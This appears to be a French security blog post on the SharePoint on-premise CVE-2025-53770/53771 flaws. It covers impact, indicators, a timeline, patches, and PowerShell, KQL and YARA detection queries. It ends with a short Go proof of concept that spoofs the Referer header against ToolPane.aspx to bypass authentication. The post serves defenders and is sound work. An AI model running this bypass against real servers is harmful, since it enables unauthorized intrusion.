SharePoint on premise is on fire đ„
đ„ SharePoint on Premise is on Fire
CVE‑2025‑53770 & CVE‑2025‑53771 — RCE + Spoofing | Exploitation active par plusieurs groupes APT
Résumé rapide
Score CVSS : 9.8 (Critique)
Impact : RCE non authentifiée + vol des clés MachineKey (persistences sessions)
Versions impactées : SharePoint Server 2016 / 2019 / Subscription Edition
IoCs : AccÚs anormal à /_layouts/15/ToolPane.aspx, création de webshells .aspx, usage de PsExec/Impacket
MITRE ATT&CK : T1078 (Valid Accounts), T1505 (Server Software Component), T1059 (Command Execution)
DĂ©tails Techniques de l’Exploit
- CVE-2025-53771 (Spoofing) : Contournement d’authentification via header
Referersur/ToolPane.aspx. - CVE-2025-53770 (RCE) : DĂ©sĂ©rialisation non sĂ©curisĂ©e menant Ă l’exĂ©cution de code arbitraire.
- Vol des MachineKeys : Permet de forger des cookies/session valides et maintenir un accĂšs.
- Post-Exploitation : Déploiement de webshells, exécution de Mimikatz, latéralisation via PsExec et Impacket.
Chronologie des ĂvĂ©nements
| Date | ĂvĂ©nement |
|---|---|
| Mai 2025 | Présentation de ToolShell (Pwn2Own Berlin) |
| 9 juillet 2025 | Patch initial Microsoft (CVE‑2025‑49704/49706) |
| 7‑18 juillet 2025 | Exploitation active des variantes |
| 19 juillet 2025 | Publication des CVE‑2025‑53770/53771 |
| 20‑21 juillet 2025 | Patchs urgents pour toutes les versions on‑premise |
Recommandations & Actions Immédiates
⚠ Si votre serveur SharePoint est exposĂ© : ConsidĂ©rez-le comme compromis tant qu’il n’est pas patchĂ© et auditĂ©.
- Appliquer immédiatement les patchs KB5002768 / KB5002754 / KB5002760
- Changer les clés ASP.NET MachineKey et redémarrer IIS
- Activer AMSI + Microsoft Defender Antivirus
- Analyser les journaux IIS pour
ToolPane.aspx - Rechercher les webshells
.aspxdansC:\inetpub\wwwroot\wss\
Commandes de DĂ©tection
# PowerShell
Get-WinEvent -LogName "Microsoft-IIS-Logging" | Where-Object { $_.Message -match "ToolPane.aspx" -and $_.Message -match "Referer:" }
# KQL - Microsoft Sentinel
AppRequests
| where Url contains "/_layouts/15/ToolPane.aspx"
| where HttpHeaders has "Referer"
| summarize count() by bin(TimeGenerated,1h), SourceIP
# YARA
rule Suspicious_ASPX_Webshell {
strings:
$cmd1 = "System.Diagnostics.Process"
$cmd2 = "ExecuteNonQuery"
condition:
any of ($cmd*) and filesize < 200KB
}
PoC Simplifié (Go - Lab uniquement)
package main
import ("fmt"; "net/http"; "io/ioutil")
func main() {
target := "http://sharepoint.local/_layouts/15/ToolPane.aspx"
req, _ := http.NewRequest("GET", target, nil)
req.Header.Set("Referer", "http://spoofed.local") // Bypass auth
resp, _ := http.DefaultClient.Do(req)
body, _ := ioutil.ReadAll(resp.Body)
fmt.Printf("Status: %s\n%s", resp.Status, body)
}
⚠ Important : Ce PoC est destinĂ© uniquement aux environnements de test autorisĂ©s.
Commentaires
Enregistrer un commentaire